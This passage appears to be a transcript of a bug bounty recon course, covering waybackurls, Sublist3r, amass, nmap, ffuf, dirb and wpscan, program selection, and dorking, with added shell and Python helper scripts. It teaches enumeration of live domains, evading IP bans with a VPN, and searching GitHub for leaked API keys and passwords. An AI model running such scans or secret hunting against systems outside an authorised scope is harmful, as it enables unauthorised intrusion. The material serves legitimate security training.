URL. If it went to a URL that didn't resolve, by default it waits 10 seconds before going to the next URL, and if you're running over a million URLs that's going to take forever, especially because a lot of them are really old and are not going to resolve. So I'd run it with -t 1000, which sets the timeout to one second: if a URL does not resolve within a second it moves on to the next one. This is one of the most comprehensive ways to pull down the maximum number of URLs for you to target within a bug bounty program.
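Added example (not the course's own script): once waybackurls has produced a large list, these shell functions pull out the hostnames to feed back into the target file, drop static assets, and collapse URLs that differ only in parameter values, which is usually what you want before spending time on httprobe. The URLs used to exercise it are constructed; the httprobe flags are the real ones (-t is the timeout in milliseconds, -c the concurrency).

```shell
#!/bin/sh
# Added example (not the course's own script). Post-process a waybackurls list
# before probing it. Input is one URL per line on stdin.

# wb_hosts: unique hostnames seen in the archive (feed these back into the
# target file for another waybackurls/httprobe pass, after a scope check).
wb_hosts() {
    sed -E 's|^[a-zA-Z]+://||; s|[/:?#].*||' | tr 'A-Z' 'a-z' | grep -v '^$' | sort -u
}

# wb_unique: drop fragments and obvious static assets, then keep one URL per
# (scheme+host+path, parameter NAMES) so ?id=1 and ?id=2 count once.
# URLs with no query string are kept once each; the first occurrence wins.
wb_unique() {
    sed 's/#.*//' |
    grep -Ev '\.(png|jpe?g|gif|svg|ico|css|woff2?|ttf|eot)(\?|$)' |
    awk -F'?' '
        {
            names = ""
            if (NF > 1) {
                n = split($2, kv, "&")
                for (i = 1; i <= n; i++) {
                    split(kv[i], p, "=")
                    names = names (i > 1 ? "&" : "") p[1]   # parameter name only
                }
            }
            key = $1 "?" names
            if (!(key in seen)) { seen[key] = 1; print }
        }'
}

# probe_live: hand the reduced list to httprobe with a 1 s timeout instead of
# the 10 s default. Needs network; not run on load.
probe_live() {
    httprobe -t 1000 -c 50
}

# Usage: cat yahoo.urls | wb_unique | probe_live > live.txt
```

Parameter order is part of the key, so /index.php?a=1&b=2 and /index.php?b=2&a=1 are kept as two entries; that is deliberate, since some back ends treat them differently, but it is the first thing to relax if the list is still too long.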
In this video I'm going to show you how to find subdomains, which is really important for any kind of bug bounty hunting or penetration testing, because subdomains are usually the least targeted: what usually happens is beginners log into the main page and try to hack on the main page, it doesn't really work out for them, and they become really frustrated. So let's go ahead and jump into it. Okay, here we are with a terminal open. Run sudo apt update and then sudo apt install sublist3r. I just want to show you Sublist3r because it's really popular and I used to use it a lot, but I've really stopped recently because it's not pulling down as many domains as I would like. Type sublist3r -h for help and you can see everything it's able to do; then run sublist3r -d yahoo.com, with -d for the domain, and it goes out and searches all these different search engines and brings back the results. Remember, when you see all of these subdomains it brings back, you need to check to make sure they're in scope. I'll show you what I do: I open this up and go okay, here's a subdomain, here's a subdomain, and let's go through these subdomains, and I'll show you what I think is the best way to do this. If you're in Firefox you'll want to install an add-on called OpenList. We add it, and it tells you right here what it does: it opens multiple URLs at a time, which becomes really helpful for us. We're okay with adding it, and here it is. What OpenList does is, when you have all these subdomains and you want to see what's on them, you copy them and paste them in. We'll just grab this one because I don't think it has anything on it; copy it, come over to OpenList and paste in a bunch of URLs. What you'd really do is copy a bunch of different ones instead of the same one over and over, and when you hit Open URLs it opens all of those tabs for you, a lot faster than opening one at a time. Here they are, it opened all of those for us. So that's one way to check out the subdomains you find, but that's not the purpose of this video; it was just an afterthought that popped into my head while shooting. So you have Sublist3r and here's the list of subdomains it brought down; you might say that's a decent-sized list, and scrolling through it it's fine, but it's not as big as we would like. One of the tools I've been using recently is amass: type amass -h and you can see exactly what it does, an in-depth attack surface mapping and asset discovery tool. amass is really cool if you can get it to work; sometimes it can be a little finicky, but it'll work for what we're about to do. You type amass and then enum, because we're going to do enumeration, and if you
just hit enter with amass enum it tells you everything you can do with the enumeration. We scroll up and run -d to give it a domain; sometimes I also like to run -ip to grab the IP addresses for the discovered names, which can be really helpful. So we run amass enum -d yahoo.com. Actually, now that I see this is running and taking a little while, let's close out of it; I want to run amass enum with -passive and then the domain, and this should run a little faster than what we had going. Okay, amass is still running, but look at all of these subdomains it has pulled down for us; it's so many that my terminal is actually lagging. We'll close out of this so that it stops, and if we just scroll through here, look at all of these subdomains: way more than we had with Sublist3r, an insane amount. All of these subdomains you'll want to check to make sure they're in scope, but look at all these Yahoo hosts, this is a crazy attack surface. If you can find a program with a really wide scope, most of the subdomains you find will be in scope, but always check. I can't believe I'm still scrolling; there has got to be nearly a thousand subdomains right there. So amass is something you'll want to check out: I love amass enum, and I run -passive because I think it runs a little faster, and then the domain. In this video I'm going to show you some cool recon tools that help you figure out what kind of technology is running on a specific website you may be targeting, and an easy way to find version numbers and search for vulnerabilities. This is really helpful: knowing what is being used and what
technologies are running on a specific website tells you what kind of attacks you should be looking for. With that, let's go ahead and jump into it. All right, here we are at tenet.htb, a box from Hack The Box; I decided to use this because if there were something vulnerable on a live web application I didn't want to accidentally show any information. One way to find out what tech stack is being used is with a browser extension called Wappalyzer. I already have it installed; you come up here, click the extension, and it shows you what the site is running: WordPress 5.6. So you can go to Google, type WordPress 5.6 and then exploit or vulnerability, and read to see if there are any vulnerabilities or anything that needs to be patched for that specific version. Sometimes in here you'll see something like a database, which is really helpful for targeting SQL injection: you have a MySQL database, so if you find any inputs (I'm not sure whether there are any here) you can try to pull off a SQL injection. Wappalyzer is also really helpful in giving you the programming language: if the web application we're testing is written in something like PHP, there are some very specific ways to go about manipulating PHP, like checking for PHP type juggling; there are different things you can do just knowing the language. Then something like this: the web server is Apache, and you can do the same thing we did with WordPress 5.6 and go see if there are any vulnerabilities that maybe have not been patched on this specific website. So Wappalyzer is a really great way to find out what kind of technology a web application is running. To install it, go to Google and type Wappalyzer; I'm on Firefox, you
might be on Chrome, so pick your browser, here's the extension, and where I see Remove you will click Install. The second one I want to show you is React Developer Tools, a really cool extension: whenever a page is using the React framework it lights up for you. I went ahead and opened up Instagram and you can see it light up blue and tell you this page is using the production build of React, so we know Instagram uses React, and there are actually a lot of popular websites that use React, such as Uber Eats, Discord, Instagram, Skype, Pinterest and many others. Knowing a site runs React, you know there's JavaScript, and there are a lot of common libraries used with React that you can Google; we're not going to go into those in detail. Then one of my favorite websites is W3Techs: it does something very similar to Wappalyzer. Enter a specific URL and it tells you what is being used. If we type in yahoo.com it pulls back all of the technology being used: server-side programming with Java, and JavaScript with jQuery, and you have this really old library version and it tells you there is a newer one. There's a lot of information in here, and if you have any questions about something like JavaScript or jQuery you can click on it and it tells you what it is and how it is used. There is one other way to find out what kind of tech stack is being used: with Wappalyzer open we can also come in and try to figure out what is used within the JavaScript. Sometimes you can see comments, or work out what the website uses, by coming in here and clicking on the debugger.
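Wappalyzer and W3Techs are reading the same signals you can pull yourself from a response. As an added example (not the course's own script), this shell function extracts the server, framework and session-cookie hints from raw HTTP headers; the header block used to exercise it is constructed, and the cookie-to-technology mapping is a short list of well-known defaults, not an exhaustive one.

```shell
#!/bin/sh
# Added example (not the course's own script): fingerprint a web stack from
# response headers. `fetch_headers` does the request; `fingerprint` parses
# headers from stdin so it can be run on a saved or constructed sample.

# fetch_headers URL  (HEAD request, follows redirects so you see the final host)
fetch_headers() {
    curl -sI -L --max-time 10 "$1"
}

# fingerprint: prints "Header: value" for headers that leak technology, plus a
# guess derived from well-known default session cookie names.
fingerprint() {
    tr -d '\r' | awk '
        {
            name = $1; sub(/:$/, "", name); lname = tolower(name)
            value = $0; sub(/^[^:]*:[ \t]*/, "", value)
        }
        lname == "server" || lname == "x-powered-by" || lname == "x-generator" ||
        lname == "x-aspnet-version" || lname == "x-drupal-cache" || lname == "via" {
            print name ": " value
        }
        lname == "set-cookie" {
            split(value, c, "=")
            cookie = tolower(c[1])
            hint = ""
            if (cookie == "phpsessid") hint = "PHP"
            else if (cookie == "jsessionid") hint = "Java servlet container"
            else if (cookie == "asp.net_sessionid") hint = "ASP.NET"
            else if (cookie == "ci_session") hint = "CodeIgniter (PHP)"
            else if (cookie == "laravel_session") hint = "Laravel (PHP)"
            else if (cookie == "csrftoken" || cookie == "sessionid") hint = "Django"
            else if (cookie ~ /^wordpress_/ || cookie == "wp-settings-time") hint = "WordPress"
            if (hint != "") print "cookie " c[1] ": suggests " hint
        }'
}

# Usage: fetch_headers https://example.com | fingerprint
```

Treat the version strings the same way the video treats WordPress 5.6: a Server or X-Powered-By value is a search term for advisories, not proof the version is exploitable, since distributions backport fixes without changing the banner.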
In the debugger it lists the JS files; click the pretty print button at the bottom and you can look through this JavaScript and see what you are able to find inside. So these are some of the common ways to find out what technologies a website uses; they're really helpful to know what's going on and exactly how to attack a website, they're useful in your recon phase, and they may even lead you to a vulnerability just because a version number has been handed to you. Okay, now I want to show you the tool nmap. If you've followed my channel for any length of time you're familiar with nmap, but I want to show you how I like to run it and the information I like to pull back from my targets. nmap is a port scanner, and if we run nmap -h it prints out everything we can do with it. One of my favorite things to do is run -v with -A: -v reports open ports as they come back, and -A gives us all the information, as it enables OS detection, script scanning, and version detection. So we type nmap -A, and usually you would add -p- for all ports if you're doing some kind of CTF, but if you're doing a bug bounty program and you don't want to knock on the doors of all the ports, you'd scan only the specific ports you want to check. I've gone ahead and opened up a Hack The Box machine, and if we run this, this is what it looks like: -v gives us back the ports as it finds them, it says port 80 is open, then it finishes and tells us about the open ports. One thing to know about Hack The Box: it says it did not follow the redirect, so it went to see if port 80 was open and we were redirected to
academy.htb, and if I actually wanted to open that up I keep getting this not found, because I need to add it to my /etc/hosts file; we're not going to do that right now, that's not the point of the video. We are told the Apache version, it tells us the allowed methods, and it gives us these other open ports as well. So this is how I like to run nmap, and we will continue on. There is one last way to search for subdomains and directories that I think will be helpful for you to know, specifically subdomains; we've seen this before for directories, but we're going to use the tool ffuf, and this is the syntax. We're going to fuzz for subdomains on yahoo.com. The tool is pretty simple to use: type ffuf, -u with the URL, which is right here, and the FUZZ keyword in the location we want to fuzz, which is the subdomain label before yahoo.com. This brute-forces subdomains and shows the ones that come back with a matching status code. Then we give it our wordlist with -w, and a delay of one second between requests with -p 1. We run it and you should see subdomains start spitting out as it finds them. Here are a few different subdomains; we'll stop it right here. I want to show you we got this 301, which is a redirect, but with different sizes and word counts, so you might want to check these out anyway. But in case we didn't want to see these 301s, we can use -fc 301 to filter by response code, and now it won't show us any of those; sometimes that comes in handy when you're fuzzing and you keep getting 401 or 403 that you really don't want to see. You can see here are some 200s, so if we wanted to we could go out and look at these subdomains and see if any of them look interesting. Now, I have mentioned this before: you can also fuzz for directories, and you
can use the FUZZ keyword like this, in this location, and now if we run it, it looks for directories. And lastly, one more thing: when you are fuzzing for APIs, ffuf is also a really great tool. We'll delete this, and if there were an API that looks like api.yahoo.com and we wanted to fuzz for valid endpoints and see what we could find, we'd run ffuf like this to look for endpoints, then go out to the web page if we're able to and look at the JSON. If not, I have a tool that fuzzes APIs for us and prints the JSON right here in our terminal; you can check that video out, I'll link it in the description, if you'd like to build that tool. It saves you the time of going out to look at the JSON yourself. So with that, that is ffuf and how we fuzz for subdomains and directories. All right, it is always good to have a couple of tools in your tool belt, so you can also run dirb like this: dirb and then https://yahoo.com, and we don't really need any more than that; it automatically starts fuzzing for us, it's really simple to use. Sometimes ffuf might give you errors or not work quite right, and it's always good to know other tools. One of the cool things about dirb is that it runs recursively: once it has run all the way through your wordlist and found, say, yahoo.com/football, it then runs against yahoo.com/football and looks for more directories within that football directory, which is really cool. So dirb is a backup fuzzer just in case ffuf isn't working for you. Another helpful tool you're going to use, especially inside CTFs, is WPScan, which you use on WordPress sites. I've gone ahead and opened up Hack The
Box and I have Tenet running here; if you have a Hack The Box subscription and want to follow along you'll need to add tenet.htb to your /etc/hosts file, which I have already done. The wpscan tool goes out and looks at the plugins on the WordPress site and checks whether any of them are vulnerable or out of date; it also checks the theme and how old it is and how long it's been since it had updates. We can check out wpscan --help and it tells us all the flags and everything we are able to use; the one I can never remember the exact form of is --plugins-detection. So we type wpscan --url http://tenet.htb and then -e, which tells it what to enumerate; I sometimes call it "all ports" out of habit, but it's all plugins: if we scroll up, ap is enumerate all plugins. Then --plugins-detection aggressive, and you can add -o if you want to save the output to a file. I pretty much never do that; I'll just open a new tab and come back, and sometimes I'll have a whole bunch of tabs open up here, which is not always that helpful. It will flag things like this and tell you a version is out of date. I told you this in the last video, but I am especially bad with wpscan, because you get a lot of information and you should read all the way through it. I remember doing a CTF about six months ago: I ran a wpscan, just skimmed through it, and missed a vulnerability that gave me remote code execution; I wasted several hours enumerating when I should have just read the entire scan. So make sure you read the
entire scan when you run one. It might take you a little bit of extra time, but it will always be worth it, because it will give you information even if you think it might not be helpful. Like right here, it doesn't flag this, but it might be worth going out and checking this version, 5.6, and whether it's insecure on this specific release, and you can go and check these different version numbers. This might take a little while because we're running the aggressive detection, but that is okay. So this is WPScan. You're going to want to run this whenever you come across WordPress web applications; it is going to be your friend, you're going to use it regularly throughout your penetration testing career, especially in the world of CTFs, and always remember: read the output.

In this video we're going to cover how to choose a bug bounty program for you to attack. One of the first things you have to do is figure out a target that you want to start doing your recon on, and sometimes people can become paralyzed by analyzing all the different targets and trying to figure out which one they want to attack first, and so I want to try and help you figure out how to narrow down your options, then specifically choose one, and then start your recon process with it. Before we jump into this too far, I kind of wanted to give you a little bit of encouragement. I'm not really a Star Wars fan, but I came across this quote a really long time ago and I found it to be really helpful, and it says: "You want to know the difference between the master and the beginner? The master has failed more times than the beginner has even tried." I think this is really helpful when trying to figure out how these top hackers are finding so many bugs while so many other people are struggling: it is because they have dedicated a lot of time to specific platforms and to learning this craft, and so we just have to keep moving forward every day and you'll be getting better. "We might get you down, you know what you got to do?" "I don't want to know what you got to do." "Just keep swimming, just keep swimming, just keep swimming, swimming, what do we do? We swim." So I decided to add "just keep moving forward" to a T-shirt recently, because it really does show the perseverance that you have to have in the field of cyber security.

So let's go ahead and take a look at HackerOne and narrow down some potential targets, and I'm going to show you my process for doing this. So here we are on HackerOne, and one of the first things I like to do is come in to Hackers and then go to the Directory so that we can start looking for different programs. Now I like to click Launch Date and sort by the date; I want to go from the newest first. I accidentally clicked it one too many times, and I actually believe you have to be logged out of HackerOne to have this feature work, so if you're logged in, go ahead and log out, and then you can look through here. Once you have them all sorted out, one of my favorite things to do is open them up and look at the scope. I like to see how big the scope is and make sure that there is a really large scope, because one of my personal and biggest struggles is that I will open up a program and get started, and then in 20 minutes I find myself out of scope, and this can be a problem. So I really like to have large scopes; it also means you have a lot larger attack surface, and there's going to be a lot more diversity in where different bug bounty hunters have been looking and testing, and so you're more likely to find a bug. So let's go ahead and scroll through some of these and look at some of the scopes. Maybe we can look at this Linktree one; I have actually never looked at this, but you can scroll down and see how large their scope is, and it seems like they have a pretty large scope. Then you need to make sure you stay away from these specific ones. So make sure, when you are searching for a target, that it has a large scope. The
second thing you should search for is something that you're really familiar with. I've noticed that there can be a lot of currency trading programs on here, and I'm not familiar with a lot of the online currency trading programs, so that's something that I'm going to just avoid. But maybe you're into shopping and you're like, I want to check out Fossil, I want to see what kind of scope they have, and you can come in here and read about it. Maybe you're really into gaming; I'm pretty sure GameStop is here, there are quite a few game-style programs on here, and you can go ahead and attack those. I'm pretty sure PlayStation is on here, GameStop is on here, and if you're familiar with those websites already, those are going to be something you're going to want to attack, because you're going to already know how the web app functions and what should be happening when you click on different links or log in. So pick a program that you personally are familiar with and are already interested in. The sub-point to this is to pick a program that you're really interested in, because you are going to be interested in clicking through the website, seeing what's happening and what products there are. Maybe you'll be interested in looking at the products, and it's going to help you figure out how the website functions, just because you're going to be a normal user: there are going to be things on the website that you want to look at, click through and check the functionality of, but you're also really interested in what they have to sell. This is going to really help in keeping your interest. So pick a program that you're familiar with, or one that offers some kind of service that you're really interested in, or products that they're selling that you would be a potential buyer of.

Now, the reason I told you to sort the programs by date is because the newer the program, the less likely it is to have already been tested by a bunch of different penetration testers or bug bounty hunters, and this is really going to help you land a vulnerability before anyone else, because the web application just hasn't been picked over as much as the older programs. Another tip to this, which is really popular and probably really common knowledge, is to choose a program that is unpaid. You can come down to one of these unpaid programs and hack on one of those, because the top hackers are going to be going after the programs that offer rewards and financial gain, because they're doing this for a living. If you're just trying to get that first bug, then you can go for the unpaid programs, and also the newest unpaid program. The last tip is kind of an OSINT tip, and I think this is really going to help you in your ability to find bugs based on what the developers are posting: go on to all the social media sites and follow the developers that work for a specific company. So if I was going to come over here to MongoDB, I'd want to find the developers that work for MongoDB on Twitter, find their GitHub pages, and follow them on any social media that I can, because developers will often brag about the different software that they're using and implementing into different projects. Lastly, they're going to be pushing their new code to GitHub, and if you are following them on GitHub you can go and check out the code that they have published before anyone else, and see if you can find any vulnerabilities within there, or maybe they have pushed some sensitive information to GitHub that they otherwise shouldn't have. So following the developers is going to be really helpful. One last thing the developers will often do is, when they launch a new subdomain or a new area of the web application that wasn't previously launched, they'll often post about it and tell you what is going on on that specific page. Following the developers is one of my last tips in trying to choose a program: if there are a lot of developers that you have the
opportunity to follow on a specific program, this is going to help you be one of the first ones to find new pages as well as code that is being pushed to GitHub. Thanks for watching.

I'm going to be installing a few tools here, and it won't take very long. The first thing I want you to install is gedit. I already have it installed, just like this, so if I hit enter it will pop open this little text pad for me here and I can write information and create files. I like to use it instead of nano or vi or vim because it's just a lot easier to move around; I can actually use my mouse to click around inside of the text file. The way to install this is to type in sudo apt install gedit, just like this; you hit enter, enter your password, and it will install for you. The second thing I want you to install is Sublist3r. If we type in sublist3r like this (not like that, like this), you can see that it doesn't do anything for me, but if I type in sudo apt install sublist3r and hit enter and type in my password, it will go ahead and install Sublist3r for me, and now if I type in sublist3r like this it will turn blue and be ready for me to use. We won't install ffuf; I think it is already on the Kali box, so we don't need to install any other tools. Those are the only two we need to install, and we'll go ahead and start looking at how to use the most common tools in the world of bug bounty hunting.

Sublist3r is one of the most popular tools for finding subdomains, and the way you use it is to just type in sublist3r, just like this, and then the domain you want to pull down subdomains for. So we'll type in www; actually, we need a -d in here, so we type in -d, and I think we can just type in yahoo.com and hit enter, and it will automatically go out and start searching for subdomains for us. One of the important things to know is that when it pulls down subdomains for us, not all of them are going to be in scope, and you should definitely check to make sure they're in scope.
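The scope check described above, as an added example that is not part of the course and is not Sublist3r's own code: it takes a list of discovered hosts (bare names or URLs, as a subdomain tool might print them) and sorts them against a program's in-scope and out-of-scope lists. The scope entries and discovered hosts below are constructed for illustration; a real program's scope page is the authority, and a host that matches a wildcard may still be operated by a third party, so ownership still has to be confirmed before testing.

```python
"""Sort discovered subdomains against a bug bounty program's scope.

Added example for this section; the scope entries and the discovered
hosts are constructed, not taken from any real program.
"""
import fnmatch
from urllib.parse import urlsplit

# Constructed scope, written the way program pages usually list it.
IN_SCOPE = ["*.example.com", "example.com", "api.example.net"]
OUT_OF_SCOPE = ["corp.example.com", "*.internal.example.com"]


def normalize_host(entry):
    """Accept a bare hostname or a full URL and return the lowercase host."""
    entry = entry.strip()
    if "://" in entry:
        entry = urlsplit(entry).hostname or ""
    return entry.lower().rstrip(".")


def matches(host, patterns):
    """Wildcard match: '*.example.com' covers any depth under example.com,
    but not example.com itself and not look-alikes such as notexample.com."""
    return any(fnmatch.fnmatchcase(host, p.lower()) for p in patterns)


def classify(host):
    """Exclusions win over inclusions; anything unlisted is 'unknown'
    and should be treated as out of scope until the program confirms it."""
    host = normalize_host(host)
    if matches(host, OUT_OF_SCOPE):
        return "out-of-scope"
    if matches(host, IN_SCOPE):
        return "in-scope"
    return "unknown"


def triage(discovered):
    """Group a subdomain tool's output by scope status, de-duplicated and sorted."""
    groups = {"in-scope": set(), "out-of-scope": set(), "unknown": set()}
    for entry in discovered:
        groups[classify(entry)].add(normalize_host(entry))
    return {status: sorted(hosts) for status, hosts in groups.items()}


# Constructed sample output, in the shape a subdomain enumerator prints.
DISCOVERED = [
    "www.example.com",
    "mail.example.com",
    "corp.example.com",
    "dev.internal.example.com",
    "https://api.example.net/v1",
    "example.com",
    "cdn.examplecdn.com",
]

if __name__ == "__main__":
    for status, hosts in triage(DISCOVERED).items():
        print(status)
        for h in hosts:
            print("   ", h)
```

Feeding the tool's output through something like this before you start fuzzing is what keeps you from finding yourself out of scope twenty minutes in; the "unknown" bucket is the list to take back to the program page rather than to a scanner.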
Some of them may not even be owned by your target, either. In this case we're looking at Yahoo, and some of these might not even be owned by Yahoo, so one of the things I like to do is open up this URL right here and look at the bottom to make sure that it says it is owned by Yahoo. So this is Sublist3r; this is a great way to pull down subdomains. There are other tools and other ways to do this, but this is one of the most common, and from here we can actually brute force other endpoints with ffuf, and we'll go ahead and check that out.

ffuf is one of my favorites, because when it brute forces it goes so quickly that I actually like to slow it down, or if I do run it at full speed, I always use a VPN, just in case my IP gets banned; I can just change my VPN to another IP address and continue on. But I usually slow ffuf down so that the server doesn't think I'm trying to DoS it. So when you use ffuf it would look something like this: we can type in ffuf -h and look at the usage we're shown right here. You have to have a wordlist, and then there are some other flags in here, and the URL. So what we would do is use ffuf -w, and then we can go, I think we can type in /usr/share/wordlists, what are my options, dirb/small.txt, we'll use this wordlist, and then we would type in https://www.yahoo.com and then FUZZ, like this. If we hit enter, we need to have our -u right here before the URL, and then if we hit enter it'll automatically start brute forcing for us right here where we put FUZZ, to see if there are any extensions that we can find. A few things to note: we use -p right here for the delays, and you can also use the filter options right here in order to filter. Let's say we wanted to filter by a response code or match a response code; we could get rid of these 302s right here, or anything that has one line, or, let's say, one word, and we can just filter that out with ffuf so that the output doesn't go quite so quickly.
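What the -p delay and the -fl / -mc filters above actually do, shown as an added example that is not the course's code and not ffuf itself: a small fuzzer in the same style that requests /FUZZ for every word, waits between requests, keeps only the response codes you care about, and drops responses with a given line count. It runs against a throwaway HTTP server started inside the script, so it can be tried offline; the paths, bodies and wordlist are constructed.

```python
"""Directory fuzzing the way ffuf does it, against a local throwaway server.

Added example for this section; not ffuf's code and not the course's.
The "site", its responses and the wordlist are constructed.
"""
import http.client
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed site: path -> (status, body). Everything else is a 404.
SITE = {
    "/admin": (200, "<html>\n<body>\n<h1>admin</h1>\n</body>\n</html>\n"),
    "/backup": (403, "forbidden"),
    "/old": (302, ""),
}

# Constructed wordlist, standing in for something like dirb/small.txt.
WORDLIST = ["admin", "backup", "old", "login", "images"]


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, body = SITE.get(self.path, (404, "not found\n"))
        self.send_response(status)
        if status == 302:
            self.send_header("Location", "/")
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body.encode())

    def log_message(self, *args):  # keep the server quiet
        pass


def start_server():
    """Bind to a free port on loopback and serve in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(host, port, path):
    """One GET without following redirects, which is how ffuf reports a 302."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, body


def fuzz(host, port, wordlist, delay=0.0, match_codes=(200, 301, 302, 403),
         filter_lines=()):
    """Request /<word> for each word.

    delay        -> pause between requests, the idea behind ffuf -p
    match_codes  -> status codes to keep, the idea behind ffuf -mc
    filter_lines -> drop responses with this many lines, the idea behind -fl
    Returns (word, status, line_count) for every response that survives.
    """
    hits = []
    for i, word in enumerate(wordlist):
        if delay and i:
            time.sleep(delay)
        status, body = fetch(host, port, "/" + word)
        lines = len(body.splitlines())
        if status not in match_codes or lines in filter_lines:
            continue
        hits.append((word, status, lines))
    return hits


def run_demo(filter_lines=(), delay=0.0):
    """Start the local site, fuzz it, shut it down, return the hits."""
    srv = start_server()
    try:
        return fuzz("127.0.0.1", srv.server_address[1], WORDLIST,
                    delay=delay, filter_lines=filter_lines)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("no filter:     ", run_demo())
    print("filter 1 line: ", run_demo(filter_lines=(1,), delay=0.05))
```

The second run is the equivalent of adding -fl 1: the one-line 403 disappears and only the multi-line 200 and the empty 302 are left, which is exactly why the filter is useful when a site answers every bad path with the same short page.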
So we can just come up here and add -fl, the flag to filter by line count, and say: anything with one line, don't return it to us. Now you can see it running, and what is brought back has more than one line on it. There are other ways to filter these out, and you can go ahead and play around with ffuf; it is one of my favorites. The other one I like to use is dirb, because it's really simple: you just type in dirb and then the URL that you want to attack, hit enter, and it'll automatically start testing for you. So those are my two favorites. I like to use dirb if I just need to do something quick and simple; if I'm looking for speed I will use ffuf.

All right, there is something called Google dorks, or Google dorking, and I'm not really sure why it's called this, so if you know, you can leave a comment and let me know why it's called Google dorking, because that just seems like a really weird name to me. Maybe I could Google it and find out. The thing about Google is that pretty much everything on the internet is stored inside of Google, the search engine; you just have to know how to look for it. Google is constantly crawling the internet and storing new files, new URLs and more information in its database; you just have to know how to find it. So let's say I was looking for a doctor named Charles Hodge. What I could type in is just Charles and then Hodge; we'll go with Charles Hodge right here, this is what I was going to use, and we hit enter. This was a president of Princeton Theological Seminary, but this is not the MD, let's say, that we're looking for. What you can do is just add quotation marks and put in "MD", and now everything that comes back will be medical doctors, or you can put literally anything you want into these quotation marks and it will find it. An example of this is if we say we want HackerOne, it'll pull up HackerOne, and let's say we want the HackerOne programs; if we type this in it'll pull it up for us anyway, but what we could do is add the quotes, just like this, and say "programs" and hit enter, and now everything that comes back will have to have "programs" inside of the search. So this is one of the ways to use Google dorks. You can also do this with GitHub as well: when you are searching through the GitHub code you can type in a specific word, like let's say we're looking for HackerOne, and then we type in quotes and we want to look for "API"; it'll pull down what has an API, and then you can come in here and look to see if they have an API that you can use. So using quotes within Google will help you narrow down your search and what is brought back, and as I mentioned, this is something that you should do within GitHub as well when you're searching for, let's say, API keys or passwords or something of that nature. And now we're going to move on to Burp.

Okay, in this video we are going to be setting up our proxy, Burp. Right now if we just hit enter on Google it loads just fine for us, but when we set up our proxy this is going to stop working, and I'm going to show you how to set it up. So we will come over to these three lines, go down to Settings, scroll all the way to the bottom, click Settings, and go to Manual proxy configuration. We're going to enter 127.0.0.1, because this is the default, with port 8080 for Burp. If we say OK to this and come over to Google now and try and run it, it's going to tell us the proxy server is refusing connections, and we will need to open up Burp. If this is the first time you've opened Burp there might be quite a few things you have to click through in order to actually get it to open, but once you get it to open it will look something like this. So if we come to Proxy and Options you'll see right here this is what we have set up, and we're going to need to import these certificates, so you'll click this top one, Next, and we are going to go Next, we're
going to open up the file, I guess we're going to select it; in the file dialog that we get, we'll go to our desktop, which is a great place to store it, we'll name the file cert.ca, and we can save this. It will save to our desktop, we'll say great, and now that this has saved we're going to need to add this into our security settings. I've already added it, so I'm not going to add it again, but it'll look just the same: you'll scroll down once you've gone to the three lines, then Settings; we'll just show this again, Settings, Privacy and Security, scroll down, that was too far, scroll down to Certificates, I guess it's all the way at the bottom, click View Certificates, and then you're going to Import. We're going to go to our desktop, say we want all files, and then select the cert that we just saved; you will click Open, and since I have already installed it we'll say OK, OK. Now when we come back over here to Google we'll need to turn our proxy interceptor off. We can test it to make sure it works, and it does; I accidentally clicked one of the little tabs down here. So if we go to Google, we are now running as we need to, and if we need to we can intercept a request just like that, but we're not going to get into that just yet. So that is how you set up Burp, and we will continue on.

Okay, we are going to be starting the URL portion of this course: what exactly we can learn from the URL and what we can do in the URL, which is actually quite a bit. The URL is something you can use to learn about how the website functions. Sometimes you can see information in it; personal information and sensitive data can be stored there. For example, if this URL had an ID of my name or my email address, those are things that you wouldn't necessarily want in a URL, or specifically if a password was in there; those are things that you could actually report, if you had sensitive data in there. But we're basically going to be looking at how we can manipulate the URL to our advantage and what we can do specifically with pages. I remember when I first started down this path of wanting to learn web app pentesting, sometimes you'll go to a capture the flag website and it will be just a blank page, and I remember coming to the blank pages and thinking, oh my goodness, I have no idea what I'm supposed to do. But for you, we've already gone through the recon portion of this course, and you know to go to dirb and just start looking for directories. We're also going to be looking at the source code; I mentioned it briefly earlier, but it's something that can be really helpful, and I'll show you why. So I made this very, very basic HTML website. What I'm about to show you is something that dirb would probably find, but if it doesn't, you can kind of see how this is going to work. You can come in here and go to page one, and then you can go, okay, well, if there's a page one, is there a page two? You hit enter, oh, page two is blank, and then you go to page three, hit enter, and we hit a forbidden page. If we have this forbidden page, there's something on it that we're not supposed to be able to access; well, how can we get there? This is when remembering to look at the source code can be really helpful, so we can come over here and go to View Page Source, and you can look through and see just how basic this really is. You can see that we have something hidden, and you can go, there is this directory or this file for more information, and so you can come here, copy this, and paste it in up here. Another way to come across this is that you can see this is hidden; we're going to cover this in more detail as we go through the course, but as you go to the source of page one, another thing that's really helpful is to right click and just go to Inspect. You can inspect what is on the page, so basically the same thing that we saw in the source, but you can see where this is hidden. Sometimes
you will have login pages and there will be hidden fields that you can open up and try and manipulate; you can actually change this to type text and it'll show up on the page as plain text. So we have this file here. If you remember, page three was forbidden and we're not able to enter it, but we can try this. This .html actually won't be on any websites, I just didn't take the time to remove it, so we'll ignore it and act like it isn't there. But if we remember from this right here, we have this "edit three", which I'm guessing is our page three, and then this would be the forbidden page where you can access files. Now we're actually going to go and practice something very similar to this, and when you do this, what you're going to need to do is go to Google; I would encourage making a new Gmail account, then going and signing up on HackerOne, and then we're going to be using Hacker101 to practice what we just saw, so that we are able to gain some practice. It is a CTF.

